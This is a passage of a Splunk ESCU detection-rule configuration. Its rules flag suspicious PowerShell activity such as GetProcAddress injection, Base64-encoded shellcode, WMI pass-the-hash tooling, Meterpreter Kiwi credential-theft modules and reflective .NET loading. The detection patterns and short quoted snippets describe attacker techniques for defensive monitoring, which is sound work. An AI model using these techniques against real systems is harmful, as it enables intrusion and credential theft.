action.notable.param.rule_description = This search detects COM CLSID execution through PowerShell. This technique was seen in several adversaries and malware such as the Conti ransomware, which has a feature to execute commands using a COM object. A network operator may use this technique in some cases, but it is a good indicator that an application is trying to gain privilege escalation or bypass UAC.
action.notable.param.rule_title = Powershell Execute COM Object
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*CreateInstance([type]::GetTypeFromCLSID*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_execute_com_object_filter`

[ESCU - Powershell Fileless Process Injection via GetProcAddress - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies `GetProcAddress` in the script block. It is not normally used by most PowerShell scripts and is typically unsafe/malicious. Many attack toolkits use GetProcAddress to obtain code execution. \
In use, it appears as `$var_gpa = $var_unsafe_native_methods.GetMethod(GetProcAddress` and is later referenced/executed elsewhere. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1055", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies `GetProcAddress` in the script block. It is not normally used by most PowerShell scripts and is typically unsafe/malicious. Many attack toolkits use GetProcAddress to obtain code execution. \
In use, it appears as `$var_gpa = $var_unsafe_native_methods.GetMethod(GetProcAddress` and is later referenced/executed elsewhere. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Limited false positives. Filter as needed.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Powershell Fileless Process Injection via GetProcAddress - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = A suspicious powershell script contains GetProcAddress API in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Powershell Fileless Process Injection via GetProcAddress - Rule
action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1055", "T1059.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies `GetProcAddress` in the script block. It is not normally used by most PowerShell scripts and is typically unsafe/malicious. Many attack toolkits use GetProcAddress to obtain code execution. \
In use, it appears as `$var_gpa = $var_unsafe_native_methods.GetMethod(GetProcAddress` and is later referenced/executed elsewhere. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.notable.param.rule_title = Powershell Fileless Process Injection via GetProcAddress
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText=*getprocaddress* | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_fileless_process_injection_via_getprocaddress_filter`

[ESCU - Powershell Fileless Script Contains Base64 Encoded Content - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies `FromBase64String` within the script block. A typical malicious instance will include additional code. \
Command example - `[Byte[]]$var_code = [System.Convert]::FromBase64String(38uqIyMjQ6rG....` \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1027", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies `FromBase64String` within the script block. A typical malicious instance will include additional code. \
Command example - `[Byte[]]$var_code = [System.Convert]::FromBase64String(38uqIyMjQ6rG....` \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = False positives should be limited. Filter as needed.
action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Fileless Script Contains Base64 Encoded Content - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Hermetic Wiper", "Malicious PowerShell", "Winter Vivern", "AsyncRAT", "Data Destruction", "IcedID", "NjRAT"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains base64 command in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Fileless Script Contains Base64 Encoded Content - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Malicious PowerShell", "Winter Vivern", "AsyncRAT", "Data Destruction", "IcedID", "NjRAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1027", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies `FromBase64String` within the script block. 
A typical malicious instance will include additional code. \ Command example - `[Byte[]]$var_code = [System.Convert]::FromBase64String(38uqIyMjQ6rG....` \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Powershell Fileless Script Contains Base64 Encoded Content action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*frombase64string*" OR ScriptBlockText = "*gnirtS46esaBmorF*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_fileless_script_contains_base64_encoded_content_filter` [ESCU - PowerShell Get LocalGroup Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic identifies the use of `get-localgroup` being used with PowerShell to identify local groups on the endpoint. During triage, review parallel processes and identify any further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic identifies the use of `get-localgroup` being used with PowerShell to identify local groups on the endpoint. During triage, review parallel processes and identify any further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2021-09-14 action.escu.modification_date = 2021-09-14 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Get LocalGroup Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Get LocalGroup Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from 
datamodel=Endpoint.Processes where (Processes.process_name=powershell.exe OR Processes.process_name=cmd.exe) (Processes.process="*get-localgroup*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `powershell_get_localgroup_discovery_filter` [ESCU - Powershell Get LocalGroup Discovery with Script Block Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the PowerShell cmdlet `get-localgroup` being run. Typically, by itself, it is not malicious but may raise suspicion based on time of day, endpoint and username. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the PowerShell cmdlet `get-localgroup` being run. 
Typically, by itself, it is not malicious but may raise suspicion based on time of day, endpoint and username. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2022-04-26 action.escu.modification_date = 2022-04-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Get LocalGroup Discovery with Script Block Logging - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Get LocalGroup Discovery with Script Block Logging - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*get-localgroup*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID 
EventCode ScriptBlockText | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `powershell_get_localgroup_discovery_with_script_block_logging_filter` [ESCU - PowerShell Invoke CIMMethod CIMSession - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies the use of the New-CIMSession cmdlet being created along with the Invoke-CIMMethod cmdlet being used within PowerShell. This particular behavior is similar to the usage of the Invoke-WMIMethod cmdlet, which is known for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. The New-CIMSession cmdlet allows users to create a new CIM session object for a specified computer system, which can then be used to execute CIM operations remotely. Similarly, the Invoke-CIMMethod cmdlet is used to invoke a specified method on one or more CIM objects. Therefore, the combination of New-CIMSession and Invoke-CIMMethod cmdlets in PowerShell can potentially indicate malicious behavior, and this analytic can help detect such activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies the use of the New-CIMSession cmdlet being created along with the Invoke-CIMMethod cmdlet being used within PowerShell. This particular behavior is similar to the usage of the Invoke-WMIMethod cmdlet, which is known for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. The New-CIMSession cmdlet allows users to create a new CIM session object for a specified computer system, which can then be used to execute CIM operations remotely. Similarly, the Invoke-CIMMethod cmdlet is used to invoke a specified method on one or more CIM objects. 
Therefore, the combination of New-CIMSession and Invoke-CIMMethod cmdlets in PowerShell can potentially indicate malicious behavior, and this analytic can help detect such activity. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives may be present based on third-party applications or administrators using CIM. It is recommended to apply appropriate filters as needed to minimize the number of false positives. action.escu.creation_date = 2023-03-22 action.escu.modification_date = 2023-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Invoke CIMMethod CIMSession - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = PowerShell was identified running Invoke-CIMMethod with New-CIMSession on $Computer$. 
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Invoke CIMMethod CIMSession - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*invoke-CIMMethod*", "*New-CimSession*") | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_invoke_cimmethod_cimsession_filter` [ESCU - PowerShell Invoke WmiExec Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the usage of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). The utility is used for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the usage of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). The utility is used for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. 
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives should be limited as this analytic is designed to detect a specific utility. It is recommended to apply appropriate filters as needed to minimize the number of false positives. action.escu.creation_date = 2023-03-22 action.escu.modification_date = 2023-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Invoke WmiExec Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Suspicious WMI Use"] action.risk = 1 action.risk.param._risk_message = PowerShell was identified running Invoke-WmiExec on $Computer$. action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Invoke WmiExec Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the usage of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). 
The utility is used for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. action.notable.param.rule_title = PowerShell Invoke WmiExec Usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*invoke-wmiexec*") | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_invoke_wmiexec_usage_filter` [ESCU - Powershell Load Module in Meterpreter - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies "MSF.Powershell","MSF.Powershell.Meterpreter","MSF.Powershell.Meterpreter.Kiwi","MSF.Powershell.Meterpreter.Transport" being used. This behavior is related to when a Meterpreter session is started and the operator runs load_kiwi. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. 
Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies "MSF.Powershell","MSF.Powershell.Meterpreter","MSF.Powershell.Meterpreter.Kiwi","MSF.Powershell.Meterpreter.Transport" being used. This behavior is related to when a Meterpreter session is started and the operator runs load_kiwi. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = The following analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = False positives should be very limited as this is strict to MetaSploit behavior. action.escu.creation_date = 2022-11-22 action.escu.modification_date = 2022-11-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Load Module in Meterpreter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["MetaSploit"] action.risk = 1 action.risk.param._risk_message = PowerShell was identified running a script utilized by Meterpreter from MetaSploit on endpoint $Computer$ by user $user_id$. 
action.risk.param._risk = [{"risk_object_field": "user_id", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Load Module in Meterpreter - Rule action.correlationsearch.annotations = {"analytic_story": ["MetaSploit"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies "MSF.Powershell","MSF.Powershell.Meterpreter","MSF.Powershell.Meterpreter.Kiwi","MSF.Powershell.Meterpreter.Transport" being used. This behavior is related to when a Meterpreter session is started and the operator runs load_kiwi. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. 
action.notable.param.rule_title = Powershell Load Module in Meterpreter action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*MSF.Powershell*","*MSF.Powershell.Meterpreter*","*MSF.Powershell.Meterpreter.Kiwi*","*MSF.Powershell.Meterpreter.Transport*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_load_module_in_meterpreter_filter` [ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the use of PowerShell loading a .NET assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modified by removing `(`, which will match more events to review. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the use of PowerShell loading a .NET assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modified by removing `(`, which will match more events to review. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives should be limited as day to day scripts do not use this method. 
action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Winter Vivern", "AgentTesla", "AsyncRAT", "Hermetic Wiper", "Malicious PowerShell", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains reflective class assembly command in $ScriptBlockText$ to load .net code in memory with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "AgentTesla", "AsyncRAT", "Hermetic Wiper", "Malicious PowerShell", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. 
Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = PowerShell Loading DotNET into Memory via Reflection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*[system.reflection.assembly]::load(*","*[reflection.assembly]*", "*reflection.assembly*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_loading_dotnet_into_memory_via_reflection_filter` [ESCU - Powershell Processing Stream Of Data - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is processing compressed stream data. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are stream flattened and will be deflated durnig execution. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. 
